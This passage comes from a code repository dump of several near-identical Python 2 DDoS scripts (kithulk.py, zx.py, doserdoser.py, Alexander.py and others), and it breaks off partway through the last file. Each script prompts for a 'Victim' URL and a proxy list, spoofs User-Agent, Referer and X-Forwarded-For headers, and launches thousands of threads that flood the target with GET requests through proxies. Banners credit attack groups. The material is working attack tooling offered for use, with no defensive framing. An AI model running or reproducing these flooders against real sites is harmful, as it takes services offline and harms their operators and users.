Gecko ) Version/5.1 Mobile/9B176 Safari/7534.48.3", 45 | "Mozilla/5.0 (Windows; U; Windows NT 6.1; tr-TR) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27",] 46 | 47 | def randomIp(): 48 | random.seed() 49 | result = str(random.randint(1, 254)) + '.' + str(random.randint(1, 254)) + '.' 50 | result = result + str(random.randint(1, 254)) + '.' + str(random.randint(1, 254)) 51 | return result 52 | 53 | def randomIpList(): 54 | random.seed() 55 | res = "" 56 | for ip in xrange(random.randint(2, 8)): 57 | res = res + randomIp() + ", " 58 | return res[0:len(res) - 2] 59 | 60 | def randomUserAgent(): 61 | return random.choice(userAgents) 62 | 63 | 64 | 65 | class attacco(threading.Thread): 66 | def run(self): 67 | current = x 68 | 69 | if current < len(listaproxy): 70 | proxy = listaproxy[current].split(':') 71 | else: 72 | proxy = random.choice(listaproxy).split(':') 73 | 74 | useragent = "User-Agent: " + randomUserAgent() + "\r\n" 75 | forward = "X-Forwarded-For: " + randomIpList() + "\r\n" 76 | 77 | httprequest = get_host + useragent + accept + forward + connection + "\r\n" 78 | 79 | while nload: 80 | time.sleep(1) 81 | 82 | while 1: 83 | try: 84 | a = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 85 | a.connect((proxy[0], int(proxy[1]))) 86 | a.send(httprequest) 87 | try: 88 | for i in xrange(3): 89 | a.send(httprequest) 90 | except: 91 | tts = 1 92 | 93 | 94 | except: 95 | proxy = random.choice(listaproxy).split(':') 96 | 97 | 98 | 99 | # gioi thieu 100 | print("DDOS By Cloverdoser") 101 | 102 | # Site 103 | url = raw_input("add Website: ") 104 | host_url = url.replace("http://", "").replace("https://", "").split('/')[0] 105 | 106 | #Proxy 107 | in_file = open(raw_input("add Proxy: "),"r") 108 | proxyf = in_file.read() 109 | in_file.close() 110 | 111 | 112 | listaproxy = proxyf.split('\n') 113 | 114 | #So luong 115 | thread = input("So luong dap: ") 116 | 117 | 118 | 119 | get_host = "GET " + url + " HTTP/1.1\r\nHost: " + host_url + "\r\n" 120 | accept = "Accept-Encoding: gzip, deflate\r\n" 121 | 122 | 123 | connection = "Connection: Keep-Alive, Persist\r\nProxy-Connection: keep-alive\r\n" 124 | 125 | 126 | 127 | nload = 1 128 | 129 | 130 | x = 0 131 | 132 | 133 | for x in xrange(thread): 134 | attacco().start() 135 | time.sleep(0.003) 136 | print "Dang chuan bi luong Ddos " + str(x) + "!" 137 | 138 | print "Dang Bat Dau Tan Cong..." 139 | 140 | 141 | nload = 0 142 | 143 | 144 | while not nload: 145 | time.sleep(1) -------------------------------------------------------------------------------- /kithulk.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | #coding: utf8 3 | 4 | import random 5 | import socket 6 | import threading 7 | import time 8 | userAgents = [ 9 | "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", 10 | "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", 11 | "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.9 Safari/536.5", 12 | "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.9 Safari/536.5", 13 | "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_0) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1063.0 Safari/536.3", 14 | "Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0", 15 | "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20120101 Firefox/29.0", 16 | "Mozilla/5.0 (X11; OpenBSD amd64; rv:28.0) Gecko/20100101 Firefox/28.0", 17 | "Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0", 18 | "Mozilla/5.0 (Windows NT 6.1; rv:27.3) Gecko/20130101 Firefox/27.3", 19 | "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:25.0) Gecko/20100101 Firefox/25.0", 20 | "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:24.0) Gecko/20100101 Firefox/24.0", 21 | "Mozilla/5.0 (Windows; U; MSIE 9.0; WIndows NT 9.0; en-US))", 22 | "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)", 23 | "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/4.0; InfoPath.2; SV1; .NET CLR 2.0.50727; WOW64)", 24 | "Mozilla/5.0 (compatible; MSIE 10.0; Macintosh; Intel Mac OS X 10_7_3; Trident/6.0)", 25 | "Opera/12.0(Windows NT 5.2;U;en)Presto/22.9.168 Version/12.00", 26 | "Opera/9.80 (Windows NT 6.0) Presto/2.12.388 Version/12.14", 27 | "Mozilla/5.0 (Windows NT 6.0; rv:2.0) Gecko/20100101 Firefox/4.0 Opera 12.14", 28 | "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0) Opera 12.14", 29 | "Opera/12.80 (Windows NT 5.1; U; en) Presto/2.10.289 Version/12.02", 30 | "Opera/9.80 (Windows NT 6.1; U; es-ES) Presto/2.9.181 Version/12.00", 31 | "Opera/9.80 (Windows NT 5.1; U; zh-sg) Presto/2.9.181 Version/12.00", 32 | "Mozilla/5.0 (compatible; MSIE 9.0; Windows Phone OS 7.5; Trident/5.0; IEMobile/9.0)", 33 | "HTC_Touch_3G Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 7.11)", 34 | "Mozilla/4.0 (compatible; MSIE 7.0; Windows Phone OS 7.0; Trident/3.1; IEMobile/7.0; Nokia;N70)", 35 | "Mozilla/5.0 (BlackBerry; U; BlackBerry 9900; en) AppleWebKit/534.11+ (KHTML, like Gecko) Version/7.1.0.346 Mobile Safari/534.11+", 36 | "Mozilla/5.0 (BlackBerry; U; BlackBerry 9850; en-US) AppleWebKit/534.11+ (KHTML, like Gecko) Version/7.0.0.254 Mobile Safari/534.11+", 37 | "Mozilla/5.0 (BlackBerry; U; BlackBerry 9850; en-US) AppleWebKit/534.11+ (KHTML, like Gecko) Version/7.0.0.115 Mobile Safari/534.11+", 38 | "Mozilla/5.0 (BlackBerry; U; BlackBerry 9850; en) AppleWebKit/534.11+ (KHTML, like Gecko) Version/7.0.0.254 Mobile Safari/534.11+", 39 | "Mozilla/5.0 (Windows NT 6.2) AppleWebKit/535.7 (KHTML, like Gecko) Comodo_Dragon/16.1.1.0 Chrome/16.0.912.63 Safari/535.7", 40 | "Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Comodo_Dragon/4.1.1.11 Chrome/4.1.249.1042 Safari/532.5", 41 | "Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25", 42 | "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/537.13+ (KHTML, like Gecko) Version/5.1.7 Safari/534.57.2", 43 | "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/534.55.3 (KHTML, like Gecko) Version/5.1.3 Safari/534.53.10", 44 | "Mozilla/5.0 (iPad; CPU OS 5_1 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko ) Version/5.1 Mobile/9B176 Safari/7534.48.3", 45 | "Mozilla/5.0 (Windows; U; Windows NT 6.1; tr-TR) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27",] 46 | 47 | reFerers = [ 48 | "https://www.facebook.com/l.php?u=", 49 | "https://drive.google.com/viewerng/viewer?url=", 50 | "http://www.google.com/translate?u=", 51 | "https://plus.google.com/share?url="] 52 | 53 | def randomIp(): 54 | random.seed() 55 | result = str(random.randint(1, 254)) + '.' + str(random.randint(1, 254)) + '.' 56 | result = result + str(random.randint(1, 254)) + '.' + str(random.randint(1, 254)) 57 | return result 58 | 59 | def randomIpList(): 60 | random.seed() 61 | res = "" 62 | for ip in xrange(random.randint(2, 8)): 63 | res = res + randomIp() + ", " 64 | return res[0:len(res) - 2] 65 | 66 | def randomUserAgent(): 67 | return random.choice(userAgents) 68 | 69 | def randomReFerer(): 70 | return random.choice(reFerers) 71 | 72 | class attacco(threading.Thread): 73 | def run(self): 74 | current = x 75 | 76 | if current < len(listaproxy): 77 | proxy = listaproxy[current].split(':') 78 | else: 79 | proxy = random.choice(listaproxy).split(':') 80 | 81 | useragent = "User-Agent: " + randomUserAgent() + "\r\n" 82 | forward = "X-Forwarded-For: " + randomIpList() + "\r\n" 83 | referer = "Referer: "+ randomReFerer() + url + "?r="+ str(random.randint(1, 1000)) + "\r\n" 84 | httprequest = get_host + useragent + referer + accept + forward + connection + "\r\n" 85 | 86 | while nload: 87 | time.sleep(1) 88 | 89 | while 1: 90 | try: 91 | a = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 92 | a.connect((proxy[0], int(proxy[1]))) 93 | a.send(httprequest) 94 | try: 95 | for i in xrange(3): 96 | a.send(httprequest) 97 | except: 98 | tts = 1 99 | 100 | 101 | except: 102 | proxy = random.choice(listaproxy).split(':') 103 | 104 | 105 | 106 | #Main 107 | print(" .----. KitHulk - DIE Group .----. ") 108 | print("»------(.:. Ddos/Dos With Proxy List.:.)------»") 109 | 110 | # Site 111 | url = raw_input("Victim: ") 112 | host_url = url.replace("http://", "").replace("https://", "").split('/')[0] 113 | 114 | #Proxy 115 | in_file = open(raw_input("File proxy: "),"r") 116 | proxyf = in_file.read() 117 | in_file.close() 118 | 119 | listaproxy = proxyf.split('\n') 120 | #So luong 121 | thread = input("So luong (1000): ") 122 | get_host = "GET " + url + " HTTP/1.1\r\nHost: " + host_url + "\r\n" 123 | accept = "Accept-Encoding: gzip, deflate\r\n" 124 | connection = "Connection: Keep-Alive, Persist\r\nProxy-Connection: keep-alive\r\n" 125 | nload = 1 126 | x = 0 127 | 128 | for x in xrange(thread): 129 | attacco().start() 130 | time.sleep(0.003) 131 | print "Dang chuan bi luong Ddos " + str(x) + "!" 132 | print "Dang Bat Dau Tan Cong..." 133 | nload = 0 134 | while not nload: 135 | time.sleep(1) -------------------------------------------------------------------------------- /zx.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | #coding: utf8 3 | 4 | import random 5 | import socket 6 | import threading 7 | import time 8 | 9 | userAgents = ["Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", 10 | "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", 11 | "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.9 Safari/536.5", 12 | "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.9 Safari/536.5", 13 | "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_0) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1063.0 Safari/536.3", 14 | "Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0", 15 | "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20120101 Firefox/29.0", 16 | "Mozilla/5.0 (X11; OpenBSD amd64; rv:28.0) Gecko/20100101 Firefox/28.0", 17 | "Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0", 18 | "Mozilla/5.0 (Windows NT 6.1; rv:27.3) Gecko/20130101 Firefox/27.3", 19 | "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:25.0) Gecko/20100101 Firefox/25.0", 20 | "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:24.0) Gecko/20100101 Firefox/24.0", 21 | "Mozilla/5.0 (Windows; U; MSIE 9.0; WIndows NT 9.0; en-US))", 22 | "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)", 23 | "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/4.0; InfoPath.2; SV1; .NET CLR 2.0.50727; WOW64)", 24 | "Mozilla/5.0 (compatible; MSIE 10.0; Macintosh; Intel Mac OS X 10_7_3; Trident/6.0)", 25 | "Opera/12.0(Windows NT 5.2;U;en)Presto/22.9.168 Version/12.00", 26 | "Opera/9.80 (Windows NT 6.0) Presto/2.12.388 Version/12.14", 27 | "Mozilla/5.0 (Windows NT 6.0; rv:2.0) Gecko/20100101 Firefox/4.0 Opera 12.14", 28 | "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0) Opera 12.14", 29 | "Opera/12.80 (Windows NT 5.1; U; en) Presto/2.10.289 Version/12.02", 30 | "Opera/9.80 (Windows NT 6.1; U; es-ES) Presto/2.9.181 Version/12.00", 31 | "Opera/9.80 (Windows NT 5.1; U; zh-sg) Presto/2.9.181 Version/12.00", 32 | "Mozilla/5.0 (compatible; MSIE 9.0; Windows Phone OS 7.5; Trident/5.0; IEMobile/9.0)", 33 | "HTC_Touch_3G Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 7.11)", 34 | "Mozilla/4.0 (compatible; MSIE 7.0; Windows Phone OS 7.0; Trident/3.1; IEMobile/7.0; Nokia;N70)", 35 | "Mozilla/5.0 (BlackBerry; U; BlackBerry 9900; en) AppleWebKit/534.11+ (KHTML, like Gecko) Version/7.1.0.346 Mobile Safari/534.11+", 36 | "Mozilla/5.0 (BlackBerry; U; BlackBerry 9850; en-US) AppleWebKit/534.11+ (KHTML, like Gecko) Version/7.0.0.254 Mobile Safari/534.11+", 37 | "Mozilla/5.0 (BlackBerry; U; BlackBerry 9850; en-US) AppleWebKit/534.11+ (KHTML, like Gecko) Version/7.0.0.115 Mobile Safari/534.11+", 38 | "Mozilla/5.0 (BlackBerry; U; BlackBerry 9850; en) AppleWebKit/534.11+ (KHTML, like Gecko) Version/7.0.0.254 Mobile Safari/534.11+", 39 | "Mozilla/5.0 (Windows NT 6.2) AppleWebKit/535.7 (KHTML, like Gecko) Comodo_Dragon/16.1.1.0 Chrome/16.0.912.63 Safari/535.7", 40 | "Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Comodo_Dragon/4.1.1.11 Chrome/4.1.249.1042 Safari/532.5", 41 | "Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25", 42 | "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/537.13+ (KHTML, like Gecko) Version/5.1.7 Safari/534.57.2", 43 | "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/534.55.3 (KHTML, like Gecko) Version/5.1.3 Safari/534.53.10", 44 | "Mozilla/5.0 (iPad; CPU OS 5_1 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko ) Version/5.1 Mobile/9B176 Safari/7534.48.3", 45 | "Mozilla/5.0 (Windows; U; Windows NT 6.1; tr-TR) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27",] 46 | 47 | def randomIp(): 48 | random.seed() 49 | result = str(random.randint(1, 254)) + '.' + str(random.randint(1, 254)) + '.' 50 | result = result + str(random.randint(1, 254)) + '.' + str(random.randint(1, 254)) 51 | return result 52 | 53 | def randomIpList(): 54 | random.seed() 55 | res = "" 56 | for ip in xrange(random.randint(2, 8)): 57 | res = res + randomIp() + ", " 58 | return res[0:len(res) - 2] 59 | 60 | def randomUserAgent(): 61 | return random.choice(userAgents) 62 | 63 | 64 | 65 | class attacco(threading.Thread): 66 | def run(self): 67 | current = x 68 | 69 | if current < len(listaproxy): 70 | proxy = listaproxy[current].split(':') 71 | else: 72 | proxy = random.choice(listaproxy).split(':') 73 | 74 | useragent = "User-Agent: " + randomUserAgent() + "\r\n" 75 | forward = "X-Forwarded-For: " + randomIpList() + "\r\n" 76 | 77 | httprequest = get_host + useragent + accept + forward + connection + "\r\n" 78 | 79 | while nload: 80 | time.sleep(1) 81 | 82 | while 1: 83 | try: 84 | a = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 85 | a.connect((proxy[0], int(proxy[1]))) 86 | a.send(httprequest) 87 | try: 88 | for i in xrange(3): 89 | a.send(httprequest) 90 | except: 91 | tts = 1 92 | 93 | 94 | except: 95 | proxy = random.choice(listaproxy).split(':') 96 | 97 | 98 | 99 | # gioi thieu 100 | print("Chich Tap The - Cang Dong Cang Vui - Thiet Ke Boi: Nguyen Ngoc Huy") 101 | print("Website: http://vedjsc.com/") 102 | # Site 103 | url = raw_input("Ten Nguoi Can Chich: ") 104 | host_url = url.replace("http://", "").replace("https://", "").split('/')[0] 105 | 106 | #Proxy 107 | in_file = open(raw_input("Lo Tren Hay Lo Duoi: "),"r") 108 | proxyf = in_file.read() 109 | in_file.close() 110 | 111 | 112 | listaproxy = proxyf.split('\n') 113 | 114 | #So luong 115 | thread = input("So Lan Chich: ") 116 | 117 | 118 | 119 | get_host = "GET " + url + " HTTP/1.1\r\nHost: " + host_url + "\r\n" 120 | accept = "Accept-Encoding: gzip, deflate\r\n" 121 | 122 | 123 | connection = "Connection: Keep-Alive, Persist\r\nProxy-Connection: keep-alive\r\n" 124 | 125 | 126 | 127 | nload = 1 128 | 129 | 130 | x = 0 131 | 132 | 133 | for x in xrange(thread): 134 | attacco().start() 135 | time.sleep(0.003) 136 | print "Doi Xiu...Dang Coi Do :v :3 " + str(x) + "!" 137 | 138 | print "Thoi Chich Luon :v :3 Khong Coi Do Nua..." 139 | 140 | 141 | nload = 0 142 | 143 | 144 | while not nload: 145 | time.sleep(1) -------------------------------------------------------------------------------- /doserdoser.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | #coding: utf8 3 | 4 | import random 5 | import socket 6 | import threading 7 | import time 8 | 9 | userAgents = ["Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", 10 | "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", 11 | "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.9 Safari/536.5", 12 | "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.9 Safari/536.5", 13 | "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_0) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1063.0 Safari/536.3", 14 | "Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0", 15 | "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20120101 Firefox/29.0", 16 | "Mozilla/5.0 (X11; OpenBSD amd64; rv:28.0) Gecko/20100101 Firefox/28.0", 17 | "Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0", 18 | "Mozilla/5.0 (Windows NT 6.1; rv:27.3) Gecko/20130101 Firefox/27.3", 19 | "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:25.0) Gecko/20100101 Firefox/25.0", 20 | "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:24.0) Gecko/20100101 Firefox/24.0", 21 | "Mozilla/5.0 (Windows; U; MSIE 9.0; WIndows NT 9.0; en-US))", 22 | "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)", 23 | "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/4.0; InfoPath.2; SV1; .NET CLR 2.0.50727; WOW64)", 24 | "Mozilla/5.0 (compatible; MSIE 10.0; Macintosh; Intel Mac OS X 10_7_3; Trident/6.0)", 25 | "Opera/12.0(Windows NT 5.2;U;en)Presto/22.9.168 Version/12.00", 26 | "Opera/9.80 (Windows NT 6.0) Presto/2.12.388 Version/12.14", 27 | "Mozilla/5.0 (Windows NT 6.0; rv:2.0) Gecko/20100101 Firefox/4.0 Opera 12.14", 28 | "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0) Opera 12.14", 29 | "Opera/12.80 (Windows NT 5.1; U; en) Presto/2.10.289 Version/12.02", 30 | "Opera/9.80 (Windows NT 6.1; U; es-ES) Presto/2.9.181 Version/12.00", 31 | "Opera/9.80 (Windows NT 5.1; U; zh-sg) Presto/2.9.181 Version/12.00", 32 | "Mozilla/5.0 (compatible; MSIE 9.0; Windows Phone OS 7.5; Trident/5.0; IEMobile/9.0)", 33 | "HTC_Touch_3G Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 7.11)", 34 | "Mozilla/4.0 (compatible; MSIE 7.0; Windows Phone OS 7.0; Trident/3.1; IEMobile/7.0; Nokia;N70)", 35 | "Mozilla/5.0 (BlackBerry; U; BlackBerry 9900; en) AppleWebKit/534.11+ (KHTML, like Gecko) Version/7.1.0.346 Mobile Safari/534.11+", 36 | "Mozilla/5.0 (BlackBerry; U; BlackBerry 9850; en-US) AppleWebKit/534.11+ (KHTML, like Gecko) Version/7.0.0.254 Mobile Safari/534.11+", 37 | "Mozilla/5.0 (BlackBerry; U; BlackBerry 9850; en-US) AppleWebKit/534.11+ (KHTML, like Gecko) Version/7.0.0.115 Mobile Safari/534.11+", 38 | "Mozilla/5.0 (BlackBerry; U; BlackBerry 9850; en) AppleWebKit/534.11+ (KHTML, like Gecko) Version/7.0.0.254 Mobile Safari/534.11+", 39 | "Mozilla/5.0 (Windows NT 6.2) AppleWebKit/535.7 (KHTML, like Gecko) Comodo_Dragon/16.1.1.0 Chrome/16.0.912.63 Safari/535.7", 40 | "Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Comodo_Dragon/4.1.1.11 Chrome/4.1.249.1042 Safari/532.5", 41 | "Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25", 42 | "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/537.13+ (KHTML, like Gecko) Version/5.1.7 Safari/534.57.2", 43 | "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/534.55.3 (KHTML, like Gecko) Version/5.1.3 Safari/534.53.10", 44 | "Mozilla/5.0 (iPad; CPU OS 5_1 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko ) Version/5.1 Mobile/9B176 Safari/7534.48.3", 45 | "Mozilla/5.0 (Windows; U; Windows NT 6.1; tr-TR) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27",] 46 | 47 | def randomIp(): 48 | random.seed() 49 | result = str(random.randint(1, 254)) + '.' + str(random.randint(1, 254)) + '.' 50 | result = result + str(random.randint(1, 254)) + '.' + str(random.randint(1, 254)) 51 | return result 52 | 53 | def randomIpList(): 54 | random.seed() 55 | res = "" 56 | for ip in xrange(random.randint(2, 8)): 57 | res = res + randomIp() + ", " 58 | return res[0:len(res) - 2] 59 | 60 | def randomUserAgent(): 61 | return random.choice(userAgents) 62 | 63 | 64 | 65 | class attacco(threading.Thread): 66 | def run(self): 67 | current = x 68 | 69 | if current < len(listaproxy): 70 | proxy = listaproxy[current].split(':') 71 | else: 72 | proxy = random.choice(listaproxy).split(':') 73 | 74 | useragent = "User-Agent: " + randomUserAgent() + "\r\n" 75 | forward = "X-Forwarded-For: " + randomIpList() + "\r\n" 76 | 77 | httprequest = get_host + useragent + accept + forward + connection + "\r\n" 78 | 79 | while nload: 80 | time.sleep(1) 81 | 82 | while 1: 83 | try: 84 | a = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 85 | a.connect((proxy[0], int(proxy[1]))) 86 | a.send(httprequest) 87 | try: 88 | for i in xrange(3): 89 | a.send(httprequest) 90 | except: 91 | tts = 1 92 | 93 | 94 | except: 95 | proxy = random.choice(listaproxy).split(':') 96 | 97 | 98 | 99 | # gioi thieu 100 | print(" .----. DDoS - Warning Team .----. ") 101 | print(" »------(¯` Ddos/Dos With Proxy List By Warning Team ´¯)------»") 102 | 103 | # Site 104 | url = raw_input("Victim: ") 105 | host_url = url.replace("http://", "").replace("https://", "").split('/')[0] 106 | 107 | #Proxy 108 | in_file = open(raw_input("Proxy: "),"r") 109 | proxyf = in_file.read() 110 | in_file.close() 111 | 112 | 113 | listaproxy = proxyf.split('\n') 114 | 115 | #So luong 116 | thread = input("So luong (3000): ") 117 | 118 | 119 | 120 | get_host = "GET " + url + " HTTP/1.1\r\nHost: " + host_url + "\r\n" 121 | accept = "Accept-Encoding: gzip, deflate\r\n" 122 | 123 | 124 | connection = "Connection: Keep-Alive, Persist\r\nProxy-Connection: keep-alive\r\n" 125 | 126 | 127 | 128 | nload = 1 129 | 130 | 131 | x = 0 132 | 133 | 134 | for x in xrange(thread): 135 | attacco().start() 136 | time.sleep(0.003) 137 | print "Dang chuan bi luong Ddos " + str(x) + "!" 138 | 139 | print "Dang Bat Dau Tan Cong..." 140 | 141 | 142 | nload = 0 143 | 144 | 145 | while not nload: 146 | time.sleep(1) -------------------------------------------------------------------------------- /Alexander.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | #coding: utf8 3 | 4 | import random 5 | import socket 6 | import threading 7 | import time 8 | 9 | userAgents = ["Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", 10 | "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", 11 | "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.9 Safari/536.5", 12 | "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.9 Safari/536.5", 13 | "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_0) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1063.0 Safari/536.3", 14 | "Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0", 15 | "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20120101 Firefox/29.0", 16 | "Mozilla/5.0 (X11; OpenBSD amd64; rv:28.0) Gecko/20100101 Firefox/28.0", 17 | "Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0", 18 | "Mozilla/5.0 (Windows NT 6.1; rv:27.3) Gecko/20130101 Firefox/27.3", 19 | "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:25.0) Gecko/20100101 Firefox/25.0", 20 | "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:24.0) Gecko/20100101 Firefox/24.0", 21 | "Mozilla/5.0 (Windows; U; MSIE 9.0; WIndows NT 9.0; en-US))", 22 | "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)", 23 | "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/4.0; InfoPath.2; SV1; .NET CLR 2.0.50727; WOW64)", 24 | "Mozilla/5.0 (compatible; MSIE 10.0; Macintosh; Intel Mac OS X 10_7_3; Trident/6.0)", 25 | "Opera/12.0(Windows NT 5.2;U;en)Presto/22.9.168 Version/12.00", 26 | "Opera/9.80 (Windows NT 6.0) Presto/2.12.388 Version/12.14", 27 | "Mozilla/5.0 (Windows NT 6.0; rv:2.0) Gecko/20100101 Firefox/4.0 Opera 12.14", 28 | "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0) Opera 12.14", 29 | "Opera/12.80 (Windows NT 5.1; U; en) Presto/2.10.289 Version/12.02", 30 | "Opera/9.80 (Windows NT 6.1; U; es-ES) Presto/2.9.181 Version/12.00", 31 | "Opera/9.80 (Windows NT 5.1; U; zh-sg) Presto/2.9.181 Version/12.00", 32 | "Mozilla/5.0 (compatible; MSIE 9.0; Windows Phone OS 7.5; Trident/5.0; IEMobile/9.0)", 33 | "HTC_Touch_3G Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 7.11)", 34 | "Mozilla/4.0 (compatible; MSIE 7.0; Windows Phone OS 7.0; Trident/3.1; IEMobile/7.0; Nokia;N70)", 35 | "Mozilla/5.0 (BlackBerry; U; BlackBerry 9900; en) AppleWebKit/534.11+ (KHTML, like Gecko) Version/7.1.0.346 Mobile Safari/534.11+", 36 | "Mozilla/5.0 (BlackBerry; U; BlackBerry 9850; en-US) AppleWebKit/534.11+ (KHTML, like Gecko) Version/7.0.0.254 Mobile Safari/534.11+", 37 | "Mozilla/5.0 (BlackBerry; U; BlackBerry 9850; en-US) AppleWebKit/534.11+ (KHTML, like Gecko) Version/7.0.0.115 Mobile Safari/534.11+", 38 | "Mozilla/5.0 (BlackBerry; U; BlackBerry 9850; en) AppleWebKit/534.11+ (KHTML, like Gecko) Version/7.0.0.254 Mobile Safari/534.11+", 39 | "Mozilla/5.0 (Windows NT 6.2) AppleWebKit/535.7 (KHTML, like Gecko) Comodo_Dragon/16.1.1.0 Chrome/16.0.912.63 